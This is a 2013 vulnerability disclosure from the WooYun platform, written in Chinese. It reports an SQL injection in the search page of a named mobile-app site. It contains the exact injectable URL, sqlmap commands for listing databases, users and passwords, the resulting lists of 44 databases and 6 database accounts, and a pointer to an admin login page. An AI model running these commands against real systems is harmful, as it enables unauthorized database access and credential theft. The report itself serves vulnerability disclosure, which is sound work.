当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-040989

漏洞标题:机客应用注入漏洞可跨库

相关厂商:机客应用

漏洞作者: 爱上襄阳

提交时间:2013-10-25 16:43

修复时间:2014-01-23 16:43

公开时间:2014-01-23 16:43

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:17

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-10-25: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-01-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

机客应用注入漏洞可跨库

详细说明:

机客应用注入漏洞可跨库
注入点:
http://top.159.com/top.aspx?Field=3&keyword=
./sqlmap.py -u "http://top.159.com/top.aspx?Field=3&keyword=" --dbs
available databases [44]:
[*] AndroidData
[*] bbs
[*] book
[*] Comprehensive
[*] daili
[*] distmodel
[*] distribution
[*] DnsData
[*] forum
[*] Gamedate
[*] ip
[*] IphoneData
[*] maishouji
[*] MakeMoney
[*] ManageDatabase
[*] master
[*] model
[*] msdb
[*] renwuguangli
[*] shangjiadate
[*] sms
[*] sms222
[*] sms321
[*] sms333
[*] SmsData
[*] smsserver
[*] Softdate
[*] tempdb
[*] temps
[*] themedate
[*] tushudata
[*] uniondata
[*] UuWapDB
[*] uuwapmud
[*] uuwapmud2
[*] wap_9e3
[*] WAPGAME
[*] wapinfo
[*] wapliulan
[*] WenDatabases
[*] WenTiDatabase
[*] WoTiNi
[*] WSDK
[*] ZEDaili
./sqlmap.py -u "http://top.159.com/top.aspx?Field=3&keyword=" --users
database management system users [6]:
[*] 159com
[*] distributor_admin
[*] sa
[*] sql159
[*] sql_copy
[*] wawa
./sqlmap.py -u "http://top.159.com/top.aspx?Field=3&keyword=" --passwords

2013-10-25 14-01-42.png

漏洞证明:

跑数据库,发现当前用户159.com是最大权限,所有的库都可以跑

2013-10-25 14-09-37.png


2013-10-25 14-10-14.png


2013-10-25 14-13-09.png


2013-10-25 14-15-14.png


后台很多用户,是可以被猜解的。

2013-10-25 14-20-36.png


http://manage.159.com/159/(S(pkosxgqmt15h44ew3a43hn55))/abcdef/Admin_login.aspx
此后台慢慢分析,应该也是可以注入得到用户,口令的。

2013-10-25 14-34-47.png

修复方案:

关键字过滤

版权声明:转载请注明来源 爱上襄阳@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝